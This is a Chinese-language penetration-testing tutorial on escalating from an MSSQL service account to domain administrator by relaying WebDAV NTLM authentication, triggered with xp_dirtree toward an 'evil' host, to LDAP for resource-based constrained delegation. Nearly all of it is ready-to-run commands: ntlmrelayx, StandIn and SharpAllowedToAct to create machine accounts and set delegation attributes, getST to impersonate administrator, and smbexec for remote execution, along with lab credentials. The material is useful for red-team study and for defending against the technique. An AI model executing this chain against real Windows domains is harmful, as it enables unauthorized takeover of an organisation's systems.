MSSQL結合RBCD提權

MSSQL結合RBCD提權

原理

這裏使用中繼的方式給他中繼到ldap中去添加msDS-AllowedToActOnBehalfOfOtherIdentity屬性。默認域控的ms-DS-MachineAccountQuota屬性設置允許所有域用戶向一個域添加10個計算機帳戶，就是說只要有一個域憑據就可以在域內任意添加機器賬戶。這個憑據可以是域內的用戶賬戶、服務賬戶、機器賬戶。而在mssql當前是nt service權限所以用的是機器賬戶去做認證，機器賬戶是可以創建機器賬戶的。

限制

需要開啓webclient服務

完全限定名（FQDN）這個可以添加dns記錄來實現

中繼的攻擊思路

xp_dirtree

xp_dirtree使用以下方式進行請求是通過 UNC 的觸發方式同樣可以對 WebDAV 進行認證，WebDAV請求去中繼是不會有NTLM簽名限制問題的。具體可以參考https://en.hackndo.com/ntlm-relay/

xp_dirtree '\\hostname@SSL\test' --ssl 443
xp_dirtree '\\hostname@SSL@1234\test' --ssl port 1234
xp_dirtree '\\hostname@1234\test' --http

復現

sc query webclient

查詢webclient是否開啓

Invoke-DNSUpdate -DNSType A -DNSName unicodesec -DNSData 192.168.92.151

python3 ntlmrelayx.py -t ldap://172.16.108.165 -smb2support --delegate-access --add-computer -debug

也可以使用

execute-assembly /Users/giaogiao/Desktop/tools/Tools/內網/StandIn_v13_Net35_45/StandIn_v13_Net45.exe  --computer DESKTOP-JSMITH --make

在當前權限下添加一個DESKTOP-JSMITH的機器賬戶

exec master.dbo.xp_dirtree '\\evil@80\test' 

觸發webdav請求

下面就是拿創建的機器賬戶獲取高權限票據，和資源委派的步驟一樣

python3 getST.py -spn cifs/DESKTOP-0ND3PBE.kdc.com 'kdc.com/LLGSQUWS$:V)iU_pwJ)(tEr!l' -impersonate administrator -dc-ip 172.16.108.165

export KRB5CCNAME=administrator.ccache
python3 smbexec.py -k -no-pass DESKTOP-0ND3PBE.kdc.com -target-ip 172.16.108.164 -debug

爛番茄(Rotten Tomato)

execute-assembly /Users/nice0e3/Downloads/StandIn_v13_Net35_45/StandIn_v13_Net35.exe  --computer DESKTOP-JSMITH --make

使用當前權限添加機器賬戶

execute-assembly /Users/nice0e3/Downloads/StandIn_v13_Net35_45/StandIn_v13_Net35.exe  --computer DESKTOP-0ND3PBE --sid S-1-5-21-879933513-2804727210-1548949402-1603

添加msDS-AllowedToActOnBehalfOfOtherIdentity這個屬性

--computer 爲需要提權的用戶

--sid 是添加的機器用戶的sid

接下來使用該機器賬戶申請高權限票據

python3 getST.py -spn cifs/DESKTOP-0ND3PBE.kdc.com 'kdc.com/DESKTOP-JSMITH$:e5YnDP1kSLpgkje' -impersonate administrator -dc-ip 172.16.108.165

export KRB5CCNAME=administrator.ccache

python3 smbexec.py -k -no-pass DESKTOP-0ND3PBE.kdc.com -target-ip 172.16.108.164 -debug

SharpAllowedToAct

也可以使用SharpAllowedToAct進行添加，需要使用原版的

https://github.com/pkb1s/SharpAllowedToAct/

execute-assembly /Users/nice0e3/Downloads/SharpAllowedToAct-Modify-main/SharpAllowedToAct/SharpAllowedToAct.exe -m giaogiao -p e5YnDP1kSLpgkje -t DESKTOP-0ND3PBE -a dc.kdc.com -d kdc.com

添加一個giaogiao的機器用戶，並且設置msDS-AllowedToActOnBehalfOfOtherIdentity屬性

刪除msDS-AllowedToActOnBehalfOfOtherIdentity屬性

execute-assembly /Users/nice0e3/Downloads/StandIn_v13_Net35_45/StandIn_v13_Net35.exe  --computer DESKTOP-0ND3PBE --remove

參考

https://www.freebuf.com/articles/database/278397.html
https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html
https://blog.ateam.qianxin.com/post/wei-ruan-bu-ren-de-0day-zhi-yu-nei-ben-di-ti-quan-lan-fan-qie/